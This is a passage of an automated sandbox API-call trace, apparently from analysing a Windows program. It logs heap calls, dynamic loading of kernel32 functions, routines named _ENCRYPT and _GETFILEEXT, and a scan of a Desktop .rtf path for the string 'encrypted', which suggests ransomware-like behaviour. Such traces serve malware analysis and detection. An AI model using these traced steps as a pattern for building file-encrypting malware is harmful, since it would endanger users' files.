lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.393] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.395] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0030.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0030.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0030.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0030.395] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0030.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0030.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0030.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0030.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.396] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.397] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0030.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ce38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0030.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.397] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0030.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0030.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.397] CloseHandle (hObject=0x140) returned 1 [0030.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0030.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.397] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.398] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.398] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.398] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.398] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.398] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.398] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0030.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.398] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.399] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.399] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.399] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c881f0, ftCreationTime.dwHighDateTime=0x1d5c219, ftLastAccessTime.dwLowDateTime=0x909c3920, ftLastAccessTime.dwHighDateTime=0x1d5be0c, ftLastWriteTime.dwLowDateTime=0x909c3920, ftLastWriteTime.dwHighDateTime=0x1d5be0c, nFileSizeHigh=0x0, nFileSizeLow=0xbbad, dwReserved0=0x0, dwReserved1=0x777648, cFileName="T2TLwD.rtf", cAlternateFileName="")) returned 0x7c20c0 [0030.399] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.399] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.399] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c881f0, ftCreationTime.dwHighDateTime=0x1d5c219, ftLastAccessTime.dwLowDateTime=0x909c3920, ftLastAccessTime.dwHighDateTime=0x1d5be0c, ftLastWriteTime.dwLowDateTime=0x909c3920, ftLastWriteTime.dwHighDateTime=0x1d5be0c, nFileSizeHigh=0x0, nFileSizeLow=0xbbad, dwReserved0=0x0, dwReserved1=0x777648, cFileName="T2TLwD.rtf", cAlternateFileName="")) returned 0x7c20c0 [0030.399] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.399] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\T2TLwD.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.400] CompareStringW (Locale=0x400, 